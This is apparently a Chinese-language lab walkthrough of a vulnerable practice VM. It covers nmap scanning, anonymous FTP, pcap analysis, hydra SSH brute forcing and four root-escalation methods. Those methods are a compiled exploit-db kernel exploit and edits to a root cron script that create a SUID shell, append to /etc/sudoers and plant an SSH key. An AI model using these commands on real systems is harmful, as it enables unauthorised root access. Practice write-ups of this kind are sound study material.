文章目录
目录
文章目录
前言
一、信息收集
二、提权
1.提权方法1
2.提权方法2
3.提权方法3
4.提权方法4
5.root免密登录的方法
总结
前言
思路清晰:
1.信息收集,寻找内网靶机,得到可以利用的ftp、ssh和web站点的常规端口。
2.因为这个靶机不是很难,所以就提权,五种不同的提权方式。
一、信息收集
扫描靶机
nmap -p- 192.168.198.0/24
![](https://img-blog.csdnimg.cn/959979e20fdb41f8b528a71dc4c1813a.png)
有80端口,访问下
![](https://img-blog.csdnimg.cn/74b1aaaeed7543928e0498f4e8a79af7.png)
其实我们都知道20和21端口都是ftp的端口
那么我们就用nmap扫一下看看是不是
![](https://img-blog.csdnimg.cn/06d196ae053b424c8dca58d0fc2c0276.png)
ssh版本
![](https://img-blog.csdnimg.cn/f1ce18de8ef840d29f586f8381d0db0b.png)
ftp可以匿名登陆
![](https://img-blog.csdnimg.cn/31c33c3bde7f40dbbf98c8242c896398.png)
wireshark的包我们解析一下
先登录
![](https://img-blog.csdnimg.cn/8edf569dc58f4a4e917ec966213b6c57.png)
看下ftp里面有什么文件
![](https://img-blog.csdnimg.cn/71144606fa6a487cb10ecf867642d461.png)
下载下来
![](https://img-blog.csdnimg.cn/488380ce4bb246ab962c9c6a2adb4e80.png)
解析一下这个包
wireshark lol.pcap
![](https://img-blog.csdnimg.cn/a442e7a42c4143988d802c3c79b097fb.png)
![](https://img-blog.csdnimg.cn/92813d5005834a05898c96059a831454.png)
![](https://img-blog.csdnimg.cn/9cb7ddc6415049ed888028beb841b777.png)
我们得到一个文件名
secret_stuff.txt
注意观察追踪流的语句
![](https://img-blog.csdnimg.cn/99d43c57cc1e4ead83310ba41fc6d4ca.png)
这个包不知道有多少个流,我们一个一个看把
![](https://img-blog.csdnimg.cn/666f5b4224904c5f928f2423634a2372.png)
![](https://img-blog.csdnimg.cn/d61985232643461f8396f4f05e10e511.png)
![](https://img-blog.csdnimg.cn/df25c3435dec462db7baa1b8b068f2b8.png)
![](https://img-blog.csdnimg.cn/59497e9dd33d4d7eaec966f236c15fc2.png)
只有四个流
我们一个一个看
第二个流传输的是这个文件
![](https://img-blog.csdnimg.cn/76ed525a93f04c09a717fadde587bfb1.png)
第三个有一串密文,还不知道留着
![](https://img-blog.csdnimg.cn/236f77149c5e4824a8d89c8cdda4b68c.png)
他说我们快接近目标了
那我们看看第四个流
还是传这个文件
![](https://img-blog.csdnimg.cn/e93eb03d0c774ba59a7d050dc87a0804.png)
那只有研究下那个密文了
研究了半天发现不是密文,是个目录。。。。
我们访问下
![](https://img-blog.csdnimg.cn/2ec0c190361741aa963774202f1d3d33.png)
![](https://img-blog.csdnimg.cn/49b2eece2c1b4ca58a1b311d944fcd75.png)
这个文件不知道用什么东西打开
我们看看这个文件是什么进制编写的
枚举是32位的ELF 二进制文件
![](https://img-blog.csdnimg.cn/ed3db20c6b8d43368c3e1a17ee80cbcf.png)
看下文件里面有没有隐藏信息
并没有什么可用的信息
![](https://img-blog.csdnimg.cn/11ad9e304e23409a91705c4adc0125fe.png)
![](https://img-blog.csdnimg.cn/eb7bb5ca1cc44f58a3c0d5ea585a5891.png)
strings roflmao
发现Find address 0x0856BF to proceed
![](https://img-blog.csdnimg.cn/84502b41480b49ac8140394a63397a42.png)
hexeditor roflmao ---十六进制的也可以用这个发现!
网页访问
![](https://img-blog.csdnimg.cn/bd9b0e2216d5426499100bc22adc579b.png)
![](https://img-blog.csdnimg.cn/c46d0f6297ac4af7a7640aadda05e283.png)
这个是password那肯定就是密码了,那前面那个大概率是账号
![](https://img-blog.csdnimg.cn/789c93b61d9748be8966d07350c132e8.png)
那就爆破试下
![](https://img-blog.csdnimg.cn/008c89f2db844feabb82ca450553b68e.png)
爆破了半天没结果
![](https://img-blog.csdnimg.cn/8aaa9c7c9f5f40468a43b9b7cb474cf8.png)
最后发现Pass.txt才是密码。。。
hydra -L user.txt -p Pass.txt 192.168.198.137 ssh
![](https://img-blog.csdnimg.cn/417735e61797431fb92501a686ec4d05.png)
ssh进去
ssh overflow@192.168.198.137
![](https://img-blog.csdnimg.cn/ca5b9624889d44bea3d1b2bbe5ed47b5.png)
二、提权
1.提权方法1
ssh登录获取bash shell
python -c 'import pty;pty.spawn("/bin/bash")'
内核版本
![](https://img-blog.csdnimg.cn/f799d9a2261646599a71df5101dd3d72.png)
![](https://img-blog.csdnimg.cn/fadb60f804554f0b84bd0cb54bad005a.png)
复制过来
开启网页下载
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
┌──(root㉿kali)-[~]
└─# python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
![](https://img-blog.csdnimg.cn/f76deddf970148d7a79450c1b926c0f7.png)
回到靶机ssh,发现断开了,判断应该是设置了定时任务什么的,不太清楚,只能先提权看看了
![](https://img-blog.csdnimg.cn/9fa1e5951f564d658279db9bb4bf9cc6.png)
重新ssh登录
![](https://img-blog.csdnimg.cn/e6ddcbdbd0d7469ea06e9346dd64aaf0.png)
gcc 37292.c -o muma1
./muma1
![](https://img-blog.csdnimg.cn/0c87ebe031a341088554f45c0f7f817f.png)
又断开了,好恶心。
这个常规方法会被cronb定时执行影响,所以我们要尝试更多可能
2.提权方法2
我们查看cronb日志
find / -name cronlog 2>/dev/null ---查看计划任务日志信息
![](https://img-blog.csdnimg.cn/5b4f2b98820e4f1b8362c2f018f98dd0.png)
每间隔2分钟执行一次任务
![](https://img-blog.csdnimg.cn/267a79e7ca6849c69755182b12dc9cd6.png)
我倒要看看他执行的是什么文件
find / -name cleaner.py 2>/dev/null ---查看文件在哪儿
![](https://img-blog.csdnimg.cn/3929c01700fe42ed98696265d42da818.png)
清除/tmp下的所有文件,并且推出程序
![](https://img-blog.csdnimg.cn/adf56e8eb9cb43a6856684b761a9230c.png)
好家伙每两分钟清除/tmp下的所有文件,并且退出当前tty,
那么肯定比我权限都高,我们就用这个执行脚本获取shell
![](https://img-blog.csdnimg.cn/87a6c5044f9742c689a8dd355eaef390.png)
vim写入不了
![](https://img-blog.csdnimg.cn/a0e614937ece4040862fde2d91f00eb5.png)
我们只能用vi或nano写入
find / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举所有可写入和执行权限的文件
find / -writable 2>/dev/null ---枚举所有可写入权限的文件
![](https://img-blog.csdnimg.cn/4d102094a39045979d5925e1c867f242.png)
先注释掉这句
![](https://img-blog.csdnimg.cn/06df25e8af9b4a658296d46fdae07432.png)
这样我们就不会掉了
我们慢慢写
这里要写入要给python远控的脚本
脚本不能直接展示,因为一些大家dddd,可以私信我们的要
此处省略远控代码注入
拿到shell了!
![](https://img-blog.csdnimg.cn/866b1156b9c142d2ad4745bd59251ce2.png)
3.提权方法3
我们ssh上去
python -c 'import pty; pty.spawn("/bin/bash")'
创建root可执行程序,获得root权限
nano /lib/log/cleaner.py
#!/usr/bin/python
import os
import sys
try:
os.system('cp /bin/sh /tmp/ou')
os.system('chmod u+s /tmp/ou')
except:
sys.exit()
断开后重新ssh上去看看
获得bash shell
![](https://img-blog.csdnimg.cn/96685392c53141cd845e2fbb535204d0.png)
4.提权方法4
或者编辑脚本以将用户溢出添加到sudoers文件中可以sudo su到root用户:
nano /lib/log/cleaner.py
#!/usr/bin/python
import os
import sys
try:
os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers')
except:
sys.exit()
![](https://img-blog.csdnimg.cn/013a1190a2744640bf57a2720b7cedac.png)
sudo su - root 得到root权限
![](https://img-blog.csdnimg.cn/7a32741e1b7c4ead94c8c7d6d754059f.png)
5.root免密登录的方法
在kali本地root的~/.ssh下写入key
cd ~/.ssh
cat id_rsa.pub
![](https://img-blog.csdnimg.cn/cf391956fb5244e6a58ed3e41d6705b3.png)
没有生成一个
ssh-keygen
空密码
![](https://img-blog.csdnimg.cn/1a0246b2741a4024b4d2d32cbb8d679e.png)
把rsa的key内容写入进靶机的/root/.ssh/里面
cat id_rsa.pub
![](https://img-blog.csdnimg.cn/3525a4fdb761428d8a1508d28950ee07.png)
登入靶机
注意执行这个shell需要
python -c 'import pty; pty.spawn("/bin/bash")'
nano /lib/log/cleaner.py
#!/usr/bin/python import os import sys try: os.system(mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD6jUb2+l9/eqOPZ9fbqx5Q3GMjLeHkxPTzomODJA02yDOzxINVxTVfGey7oae+6CqTJZLobypXXD3sTm3oBUKxZxT7dfKZ09ds1F2GK6MdXXWqLI0FqpBCtbYxO9UNIOD9a26OreHHt5t6/wM4oxf95UqNQDJ1/xAlcXPkpOIUCzBKrRnt59TmJycVAGhyZnyBT6ybgacaQDUoS6ifUzRr5xXTCvDDnSQ0Vu0FepRXf1rB9L7f3gCz7HWEU3AkGVnOEoCwtddaHFPF3r6cO7KzWqwG0aDO4sxdbR0WfLqAoUrI6Vkob0IRkz0ZBkmA7K/Ew2s8E5xH53kRV2fPDa3x1S9/z+nPZDma1yYu4UjoWsIXz5+iYU0dYS8UcolEXFwH4f2zIbvQy1JnTc6NnJ/TDsdUMXmtye5VS36reczIvbbRCTz0k+ZiJAooh2Z53sS4BZQ4Sk3XMokwlDy61JFoDdqflXs3koi+bX05aT+Sc9Pdh2sbNK7WOTqQJyOmceU= root@kali" >> /root/.ssh/authorized_keys) except: sys.exit()
![](https://img-blog.csdnimg.cn/67120db11829450b84e4a20409449d72.png)
等他计划任务执行
![](https://img-blog.csdnimg.cn/74a80f16051c4f7aab01de3475d17b22.png)
断开了证明执行了
等ssh起来
![](https://img-blog.csdnimg.cn/29a8a89ef5c540e5a83ff7c95df0185d.png)
总结
这里展示了五种提权方法,基本覆盖了常用的内网各种姿势,希望大家学有所成,请不要用于其他渠道。
特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)